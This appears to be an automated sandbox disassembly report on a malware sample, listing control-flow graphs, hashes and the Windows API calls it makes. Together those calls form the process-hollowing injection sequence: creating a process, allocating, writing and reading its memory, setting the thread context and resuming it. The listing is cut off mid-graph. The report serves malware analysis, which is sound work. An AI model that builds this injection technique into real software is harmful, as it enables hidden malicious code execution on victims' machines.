                                                control_flow_graph 74 6ca1537-6ca153c 75 6ca153e-6ca15d5 74->75 76 6ca14df-6ca14fa 74->76 79 6ca160e-6ca162e 75->79 80 6ca15d7-6ca15e1 75->80 81 6ca14fc-6ca1502 76->81 82 6ca1503-6ca1528 76->82 87 6ca1630-6ca163a 79->87 88 6ca1667-6ca1696 79->88 80->79 83 6ca15e3-6ca15e5 80->83 81->82 85 6ca1608-6ca160b 83->85 86 6ca15e7-6ca15f1 83->86 85->79 91 6ca15f3 86->91 92 6ca15f5-6ca1604 86->92 87->88 94 6ca163c-6ca163e 87->94 101 6ca1698-6ca16a2 88->101 102 6ca16cf-6ca1789 CreateProcessA 88->102 91->92 92->92 93 6ca1606 92->93 93->85 96 6ca1640-6ca164a 94->96 97 6ca1661-6ca1664 94->97 99 6ca164e-6ca165d 96->99 100 6ca164c 96->100 97->88 99->99 104 6ca165f 99->104 100->99 101->102 103 6ca16a4-6ca16a6 101->103 113 6ca178b-6ca1791 102->113 114 6ca1792-6ca1818 102->114 105 6ca16a8-6ca16b2 103->105 106 6ca16c9-6ca16cc 103->106 104->97 108 6ca16b6-6ca16c5 105->108 109 6ca16b4 105->109 106->102 108->108 110 6ca16c7 108->110 109->108 110->106 113->114 124 6ca181a-6ca181e 114->124 125 6ca1828-6ca182c 114->125 124->125 126 6ca1820 124->126 127 6ca182e-6ca1832 125->127 128 6ca183c-6ca1840 125->128 126->125 127->128 129 6ca1834 127->129 130 6ca1842-6ca1846 128->130 131 6ca1850-6ca1854 128->131 129->128 130->131 132 6ca1848 130->132 133 6ca1866-6ca186d 131->133 134 6ca1856-6ca185c 131->134 132->131 135 6ca186f-6ca187e 133->135 136 6ca1884 133->136 134->133 135->136 138 6ca1885 136->138 138->138
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06CA1776
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 9309c50e52bad3503faba9416f34f64dfd954c9a9cfaf924aea31c54f2745698
                                                • Instruction ID: 4d959c805bb3ae7ff464871cb5f21edb6a61cb8a7761c83ea34f70eb7c384d2d
                                                • Opcode Fuzzy Hash: 9309c50e52bad3503faba9416f34f64dfd954c9a9cfaf924aea31c54f2745698
                                                • Instruction Fuzzy Hash: 7FA16B71D0031A8FEB64DF69C8417DDBBB2EB44314F19856AD818E7240DB749A85CF91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 139 6ca1540-6ca15d5 141 6ca160e-6ca162e 139->141 142 6ca15d7-6ca15e1 139->142 147 6ca1630-6ca163a 141->147 148 6ca1667-6ca1696 141->148 142->141 143 6ca15e3-6ca15e5 142->143 145 6ca1608-6ca160b 143->145 146 6ca15e7-6ca15f1 143->146 145->141 149 6ca15f3 146->149 150 6ca15f5-6ca1604 146->150 147->148 152 6ca163c-6ca163e 147->152 158 6ca1698-6ca16a2 148->158 159 6ca16cf-6ca1789 CreateProcessA 148->159 149->150 150->150 151 6ca1606 150->151 151->145 153 6ca1640-6ca164a 152->153 154 6ca1661-6ca1664 152->154 156 6ca164e-6ca165d 153->156 157 6ca164c 153->157 154->148 156->156 161 6ca165f 156->161 157->156 158->159 160 6ca16a4-6ca16a6 158->160 170 6ca178b-6ca1791 159->170 171 6ca1792-6ca1818 159->171 162 6ca16a8-6ca16b2 160->162 163 6ca16c9-6ca16cc 160->163 161->154 165 6ca16b6-6ca16c5 162->165 166 6ca16b4 162->166 163->159 165->165 167 6ca16c7 165->167 166->165 167->163 170->171 181 6ca181a-6ca181e 171->181 182 6ca1828-6ca182c 171->182 181->182 183 6ca1820 181->183 184 6ca182e-6ca1832 182->184 185 6ca183c-6ca1840 182->185 183->182 184->185 186 6ca1834 184->186 187 6ca1842-6ca1846 185->187 188 6ca1850-6ca1854 185->188 186->185 187->188 189 6ca1848 187->189 190 6ca1866-6ca186d 188->190 191 6ca1856-6ca185c 188->191 189->188 192 6ca186f-6ca187e 190->192 193 6ca1884 190->193 191->190 192->193 195 6ca1885 193->195 195->195
                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06CA1776
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 80d5c9731ff34d57e13e2ff321b9e42d412f9911c0ecc7990e4e173b88111ff0
                                                • Instruction ID: 48f9f7f98892c4e1764c58db1557333a9890debd7cab6bce33b6aff8262c8108
                                                • Opcode Fuzzy Hash: 80d5c9731ff34d57e13e2ff321b9e42d412f9911c0ecc7990e4e173b88111ff0
                                                • Instruction Fuzzy Hash: 37915B71D0031A8FEB64DF69C841BDDBBB2FB48314F1985A9E818E7240DB749A85CF91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 196 6ca12b0-6ca1306 199 6ca1308-6ca1314 196->199 200 6ca1316-6ca1355 WriteProcessMemory 196->200 199->200 202 6ca135e-6ca138e 200->202 203 6ca1357-6ca135d 200->203 203->202
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06CA1348
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 13ff24bb59b80a17a1a8f5a4a7ec5a9e4a060763f869a84d41a7378b577b5c53
                                                • Instruction ID: fc17a47fb42563c3dfc80f3ad2c2151e027ee69723527c9001ea1fcbbe7f9507
                                                • Opcode Fuzzy Hash: 13ff24bb59b80a17a1a8f5a4a7ec5a9e4a060763f869a84d41a7378b577b5c53
                                                • Instruction Fuzzy Hash: DD2148B1D013499FDB10CFAAC881BDEBBF5FF48320F54842AE958A7640C7799945CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 207 6ca12b8-6ca1306 209 6ca1308-6ca1314 207->209 210 6ca1316-6ca1355 WriteProcessMemory 207->210 209->210 212 6ca135e-6ca138e 210->212 213 6ca1357-6ca135d 210->213 213->212
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06CA1348
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: da24459c026fa9d7c07dedc2715ea43650648e8cdb5be7e156855f4683675387
                                                • Instruction ID: 13dde00cf081381d36805b73e80daf173cb37963a23774d0d1430e81d63f8585
                                                • Opcode Fuzzy Hash: da24459c026fa9d7c07dedc2715ea43650648e8cdb5be7e156855f4683675387
                                                • Instruction Fuzzy Hash: FF2157B1D003099FDB10CFAAC881BDEBBF5FF48320F548429E958A7640C7799941CBA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 217 6ca1118-6ca116b 220 6ca117b-6ca11ab Wow64SetThreadContext 217->220 221 6ca116d-6ca1179 217->221 223 6ca11ad-6ca11b3 220->223 224 6ca11b4-6ca11e4 220->224 221->220 223->224
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CA119E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: e8ca7de0e7b3e60dde578fb3f38c87a7b132ba224e41f954f518da873e619bfc
                                                • Instruction ID: c6104c9dc654307c321f38376bf6055a8616fdc2a3af5d942cff8bdb1603318c
                                                • Opcode Fuzzy Hash: e8ca7de0e7b3e60dde578fb3f38c87a7b132ba224e41f954f518da873e619bfc
                                                • Instruction Fuzzy Hash: AC2159B1D003098FDB10DFAAC8817EEBBF4EB48214F54842ED559A7240CB789A45CFA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 228 6ca13a3-6ca1435 ReadProcessMemory 232 6ca143e-6ca146e 228->232 233 6ca1437-6ca143d 228->233 233->232
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06CA1428
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 8bb7b7b0ab5feb4cc60d1d55d91a2ef064d7f64b197b0875d50de79be9309a21
                                                • Instruction ID: 8c3d700f0243bb8ec6b425165c20003c915e47480ea3304d7281f9231860776f
                                                • Opcode Fuzzy Hash: 8bb7b7b0ab5feb4cc60d1d55d91a2ef064d7f64b197b0875d50de79be9309a21
                                                • Instruction Fuzzy Hash: D62116B1C013599FDB10DFAAC881BDEBBF5FF48314F548429E918A7640C7799941CBA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 247 6ca13a8-6ca1435 ReadProcessMemory 250 6ca143e-6ca146e 247->250 251 6ca1437-6ca143d 247->251 251->250
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06CA1428
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 48e1c77cac1f10a92e663cb059927545ed5c5e9ed40017aeb0d0e5c4748e2bc0
                                                • Instruction ID: bef5dcca4022cd49d273120fedf6be9b6b199dcef806ff1ceb280560ac744e20
                                                • Opcode Fuzzy Hash: 48e1c77cac1f10a92e663cb059927545ed5c5e9ed40017aeb0d0e5c4748e2bc0
                                                • Instruction Fuzzy Hash: E12114B1C003499FDB10DFAAC881BEEBBF5FF48310F54842AE918A7640C7799941CBA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 237 6ca1120-6ca116b 239 6ca117b-6ca11ab Wow64SetThreadContext 237->239 240 6ca116d-6ca1179 237->240 242 6ca11ad-6ca11b3 239->242 243 6ca11b4-6ca11e4 239->243 240->239 242->243
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CA119E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 4345e3af6f0be984b993804a52e0978f89e09c9bcbc420cc21ba3e44e01301b0
                                                • Instruction ID: ccd6407bb2a44d1f0a464bcb77b9931a4a85eef50cd93c4c4d30a2106ef8be1d
                                                • Opcode Fuzzy Hash: 4345e3af6f0be984b993804a52e0978f89e09c9bcbc420cc21ba3e44e01301b0
                                                • Instruction Fuzzy Hash: 29210775D003098FDB10DFAAC8857AEBBF4AB48214F54842DD559A7640CB789945CFA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 255 6ca11f3-6ca1273 VirtualAllocEx 259 6ca127c-6ca12a1 255->259 260 6ca1275-6ca127b 255->260 260->259
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06CA1266
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: d6aaf2a68a83be56c554b986ef152ac63745ade603d408a07acefe23cb405649
                                                • Instruction ID: 50b1a981832816876c764a50363cddc6d2bf8ed3d57cbada7374b3654dc76c96
                                                • Opcode Fuzzy Hash: d6aaf2a68a83be56c554b986ef152ac63745ade603d408a07acefe23cb405649
                                                • Instruction Fuzzy Hash: 37112676C003499FDB20DFAAC845BDFBBF5EB49324F148419E529A7250CB75A941CFA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 264 6ca11f8-6ca1273 VirtualAllocEx 267 6ca127c-6ca12a1 264->267 268 6ca1275-6ca127b 264->268 268->267
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06CA1266
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: a638b4cee609d340b32dae69627b988a2641ee8f87468739f3bb7c20af0c004a
                                                • Instruction ID: d5e2d71d3e9d8d3ff5a83bdaa5593f7e6f276feec051e7b2a72491557e9ef09e
                                                • Opcode Fuzzy Hash: a638b4cee609d340b32dae69627b988a2641ee8f87468739f3bb7c20af0c004a
                                                • Instruction Fuzzy Hash: 65112675C003499FDB20DFAAC845BDEBBF5EB48320F148419E525A7250CB759940CFA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 272 6ca1068-6ca10df ResumeThread 276 6ca10e8-6ca110d 272->276 277 6ca10e1-6ca10e7 272->277 277->276
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 0d40e169c081c0ac7e9daf77deea3097d072b4d70584377b426f8db6657de92e
                                                • Instruction ID: c2995add3825933b9867a9e6f6c2ca470713f6755d27d4f5dd305ab6ff43db5e
                                                • Opcode Fuzzy Hash: 0d40e169c081c0ac7e9daf77deea3097d072b4d70584377b426f8db6657de92e
                                                • Instruction Fuzzy Hash: B5115BB1D003898FDB20DFAAD4457DEFBF4EB88224F14841ED555A7640CA795944CB94

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 281 6ca1070-6ca10df ResumeThread 284 6ca10e8-6ca110d 281->284 285 6ca10e1-6ca10e7 281->285 285->284
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 93663db09d984e7a69479b7d483883451df2a3976e423092be150601272171ee
                                                • Instruction ID: 321edbf815a3afcdd3b937abcea5d735071081085ede4d1378a40e6394cc1e2b
                                                • Opcode Fuzzy Hash: 93663db09d984e7a69479b7d483883451df2a3976e423092be150601272171ee
                                                • Instruction Fuzzy Hash: AA112871D003498FDB20DFAAC44579EFBF9AB48224F14841AD519A7640CA79A945CBA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 289 6ca412b-6ca419a PostMessageW 291 6ca419c-6ca41a2 289->291 292 6ca41a3-6ca41b7 289->292 291->292
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06CA418D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 1b0aab9298525953eae69a5bcfe54a5d0ffa26aeecee01e1fe7ccef7b3333bda
                                                • Instruction ID: 93d18cfcef0bbb6520386cb7ab56b68b0725ba91859c9d041cfcabb9e85e3166
                                                • Opcode Fuzzy Hash: 1b0aab9298525953eae69a5bcfe54a5d0ffa26aeecee01e1fe7ccef7b3333bda
                                                • Instruction Fuzzy Hash: 4511D3B5C003499FDB20DF9AD845BDEBBF8EB48324F108419E558B7250C375A944CFA5

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 294 6ca4130-6ca419a PostMessageW 295 6ca419c-6ca41a2 294->295 296 6ca41a3-6ca41b7 294->296 295->296
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06CA418D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 0feda47e5f70b65826eb3c84cef8ebedc9b35009843981585e3a3fba6d493a8e
                                                • Instruction ID: 993c9d5d161d581d43f0358a77945e201b5536699f71ed1868bdae8f697d0b57
                                                • Opcode Fuzzy Hash: 0feda47e5f70b65826eb3c84cef8ebedc9b35009843981585e3a3fba6d493a8e
                                                • Instruction Fuzzy Hash: 9611E5B5C003499FDB20DF9AD845BDEFBF8EB48324F108419D518A7250C375A944CFA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: d~W7
                                                • API String ID: 0-2250806414
                                                • Opcode ID: 0a76dd62f6120fb1870fe7deec4bb8fd67a7d6acaec5fe8bbbbb354fa6685692
                                                • Instruction ID: b8cf0e7cacb0ce3cb6f1aa89195dcf12878e0462e77ae6f1076db512e742d820
                                                • Opcode Fuzzy Hash: 0a76dd62f6120fb1870fe7deec4bb8fd67a7d6acaec5fe8bbbbb354fa6685692
                                                • Instruction Fuzzy Hash: 5BE1D974E0021A8FDB14DFA9C580AAEFBF2BF89308F248169D455AB359D730AD41CF61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1394058006.0000000006CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6ca0000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 731f3aea245d031020fe8fc96edf3b8f5992d04643c1709c749a41b1a876913a
                                                • Instruction ID: e19d1f02699f93f3087c98151d97fb8fd62d94d6654b007d2b22d5b7a07b0b43
                                                • Opcode Fuzzy Hash: 731f3aea245d031020fe8fc96edf3b8f5992d04643c1709c749a41b1a876913a
                                                • Instruction Fuzzy Hash: 81D19C31B003418FEB55DB76C4507AEB7F6AF89308F5484ADD1568B391DB34E901CB92

                                                Execution Graph

                                                Execution Coverage:18.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:33.3%
                                                Total number of Nodes:30
                                                Total number of Limit Nodes:7
                                                execution_graph 19927 169e018 19928 169e024 19927->19928 19931 6db2968 19928->19931 19932 6db298a 19931->19932 19933 169e0c3 19932->19933 19937 6db992c 19932->19937 19943 6db9328 19932->19943 19950 6db9548 19932->19950 19938 6db97e3 19937->19938 19940 6db9924 LdrInitializeThunk 19938->19940 19942 6db9328 2 API calls 19938->19942 19941 6db9a81 19940->19941 19941->19933 19942->19938 19944 6db933a 19943->19944 19945 6db933f 19943->19945 19944->19933 19945->19944 19946 6db957e LdrInitializeThunk 19945->19946 19948 6db9619 19946->19948 19947 6db96d9 19947->19933 19948->19947 19949 6db9a69 LdrInitializeThunk 19948->19949 19949->19947 19951 6db9579 19950->19951 19952 6db957e LdrInitializeThunk 19950->19952 19951->19952 19957 6db9619 19952->19957 19953 6db96d9 19953->19933 19954 6db9924 LdrInitializeThunk 19954->19953 19956 6db9328 2 API calls 19956->19957 19957->19953 19957->19954 19957->19956 19958 6db9c70 19959 6db9c9d 19958->19959 19960 6db9328 2 API calls 19959->19960 19961 6dbbb7f 19959->19961 19963 6db9fa6 19959->19963 19960->19963 19962 6db9328 2 API calls 19962->19963 19963->19961 19963->19962
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (oq$4'q$4'q$4'q
                                                • API String ID: 0-2528434116
                                                • Opcode ID: 08689cee5e193b7aa44f8c620d773687baf4d95c906a83b2cc51d77766db3050
                                                • Instruction ID: 18b36f4565540114df229ad2feaaedf742fab8c16cfacf7e47a947744e0d7eaf
                                                • Opcode Fuzzy Hash: 08689cee5e193b7aa44f8c620d773687baf4d95c906a83b2cc51d77766db3050
                                                • Instruction Fuzzy Hash: 87A26E70A002098FCF15CFA8C984AAEBBFABF88314F15855AE905DB365D735ED41CB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 590 1696fc8-1696ffe 591 1697006-169700c 590->591 734 1697000 call 1697118 590->734 735 1697000 call 1696fc8 590->735 736 1697000 call 16969a0 590->736 592 169705c-1697060 591->592 593 169700e-1697012 591->593 596 1697062-1697071 592->596 597 1697077-169708b 592->597 594 1697021-1697028 593->594 595 1697014-1697019 593->595 598 16970fe-169713b 594->598 599 169702e-1697035 594->599 595->594 600 169709d-16970a7 596->600 601 1697073-1697075 596->601 602 1697093-169709a 597->602 731 169708d call 169a0e8 597->731 732 169708d call 1699de0 597->732 733 169708d call 1699dd0 597->733 611 169713d-1697143 598->611 612 1697146-1697166 598->612 599->592 605 1697037-169703b 599->605 603 16970a9-16970af 600->603 604 16970b1-16970b5 600->604 601->602 607 16970bd-16970f7 603->607 604->607 608 16970b7 604->608 609 169704a-1697051 605->609 610 169703d-1697042 605->610 607->598 608->607 609->598 613 1697057-169705a 609->613 610->609 611->612 618 1697168 612->618 619 169716d-1697174 612->619 613->602 621 16974fc-1697505 618->621 622 1697176-1697181 619->622 623 169750d-1697519 622->623 624 1697187-169719a 622->624 631 169751b-1697536 623->631 632 1697584-169759a 623->632 629 169719c-16971aa 624->629 630 16971b0-16971cb 624->630 629->630 637 1697484-169748b 629->637 638 16971cd-16971d3 630->638 639 16971ef-16971f2 630->639 631->632 644 169759c-16975ab 632->644 645 16975e4 632->645 637->621 643 169748d-169748f 637->643 641 16971dc-16971df 638->641 642 16971d5 638->642 646 16971f8-16971fb 639->646 647 169734c-1697352 639->647 650 1697212-1697218 641->650 651 16971e1-16971e4 641->651 642->641 642->647 649 169743e-1697441 642->649 642->650 652 169749e-16974a4 643->652 653 1697491-1697496 643->653 644->645 667 16975ad-16975b3 644->667 648 16975e9-16975eb 645->648 646->647 655 1697201-1697207 646->655 647->649 654 1697358-169735d 647->654 661 1697508 649->661 662 1697447-169744d 649->662 663 169721a-169721c 650->663 664 169721e-1697220 650->664 656 16971ea 651->656 657 169727e-1697284 651->657 652->623 658 16974a6-16974ab 652->658 653->652 654->649 655->647 660 169720d 655->660 656->649 657->649 668 169728a-1697290 657->668 665 16974ad-16974b2 658->665 666 16974f0-16974f3 658->666 660->649 661->623 669 169744f-1697457 662->669 670 1697472-1697476 662->670 671 169722a-1697233 663->671 664->671 665->661 676 16974b4 665->676 666->661 675 16974f5-16974fa 666->675 677 16975b5 667->677 678 16975b7-16975c3 667->678 679 1697292-1697294 668->679 680 1697296-1697298 668->680 669->623 681 169745d-169746c 669->681 670->637 674 1697478-169747e 670->674 672 1697235-1697240 671->672 673 1697246-169726e 671->673 672->649 672->673 706 1697362-1697398 673->706 707 1697274-1697279 673->707 674->622 674->637 675->621 675->643 682 16974bb-16974c0 676->682 683 16975c5-16975de 677->683 678->683 684 16972a2-16972b9 679->684 680->684 681->630 681->670 689 16974e2-16974e4 682->689 690 16974c2-16974c4 682->690 683->645 702 16975e0-16975e2 683->702 697 16972bb-16972d4 684->697 698 16972e4-169730b 684->698 689->661 692 16974e6-16974e9 689->692 693 16974d3-16974d9 690->693 694 16974c6-16974cb 690->694 692->666 693->623 696 16974db-16974e0 693->696 694->693 696->689 701 16974b6-16974b9 696->701 697->706 710 16972da-16972df 697->710 698->661 712 1697311-1697314 698->712 701->661 701->682 702->648 714 169739a-169739e 706->714 715 16973a5-16973ad 706->715 707->706 710->706 712->661 713 169731a-1697343 712->713 713->706 730 1697345-169734a 713->730 717 16973bd-16973c1 714->717 718 16973a0-16973a3 714->718 715->661 716 16973b3-16973b8 715->716 716->649 720 16973e0-16973e4 717->720 721 16973c3-16973c9 717->721 718->715 718->717 723 16973ee-169740d call 16976f1 720->723 724 16973e6-16973ec 720->724 721->720 722 16973cb-16973d3 721->722 722->661 726 16973d9-16973de 722->726 727 1697413-1697417 723->727 724->723 724->727 726->649 727->649 728 1697419-1697435 727->728 728->649 730->706 731->602 732->602 733->602 734->591 735->591 736->591
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.3850259462.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_1690000_SecuriteInfo.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (oq$(oq$,q$,q
                                                • API String ID: 0-620556200
                                                • Opcode ID: d5976deec03e48e3ddc16382d79445964e9a22a531223dd6927b8f2e000ae6f3
                                                • Instruction ID: 207f3b32e2d9c3092dee9137f4ec4fba5987d294659241a345785d86aa92cd59
                                                • Opcode Fuzzy Hash: d5976deec03e48e3ddc16382d79445964e9a22a531223dd6927b8f2e000ae6f3
                                                • Instruction Fuzzy Hash: 16125C70A11209DFDF15CF69C884AADBBBABF48314F19806AE905AB361DB35ED41CF50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 738 16929ec-16929f6 740 16929f8-1692a01 738->740 741 1692981-169298a 738->741 742 1692990-1692999 740->742 743 1692a03-1692a3b 740->743 741->742 748 16929a0-16929c8 742->748 746 1692a5d-1692aac 743->746 747 1692a3d-1692a5c 743->747 753 1692aae-1692ab5 746->753 754 1692ac7-1692acf 746->754 755 1692abe-1692ac5 753->755 756 1692ab7-1692abc 753->756 757 1692ad2-1692ae6 754->757 755->757 756->757 760 1692ae8-1692aef 757->760 761 1692afc-1692b04 757->761 762 1692af1-1692af3 760->762 763 1692af5-1692afa 760->763 764 1692b06-1692b0a 761->764 762->764 763->764 766 1692b6a-1692b6d 764->766 767 1692b0c-1692b21 764->767 768 1692b6f-1692b84 766->768 769 1692bb5-1692bbb 766->769 767->766 775 1692b23-1692b26 767->775 768->769 779 1692b86-1692b8a 768->779 770 1692bc1-1692bc3 769->770 771 16936b6 769->771 770->771 773 1692bc9-1692bce 770->773 776 16936bb-16936f0 771->776 777 1693664-1693668 773->777 778 1692bd4 773->778 780 1692b28-1692b2a 775->780 781 1692b45-1692b63 call 16902c8 775->781 797 169371f-1693874 776->797 798 16936f2-169371a 776->798 783 169366a-169366d 777->783 784 169366f-16936b5 777->784 778->777 785 1692b8c-1692b90 779->785 786 1692b92-1692bb0 call 16902c8 779->786 780->781 787 1692b2c-1692b2f 780->787 781->766 783->776 783->784 785->769 785->786 786->769 787->766 791 1692b31-1692b43 787->791 791->766 791->781 801 16938a6-16938bc 797->801 802 1693876-1693881 797->802 798->797 804 16938ee-16938f4 801->804 805 16938be-16938c4 801->805 802->801 807 16938f6-169390c 804->807 810 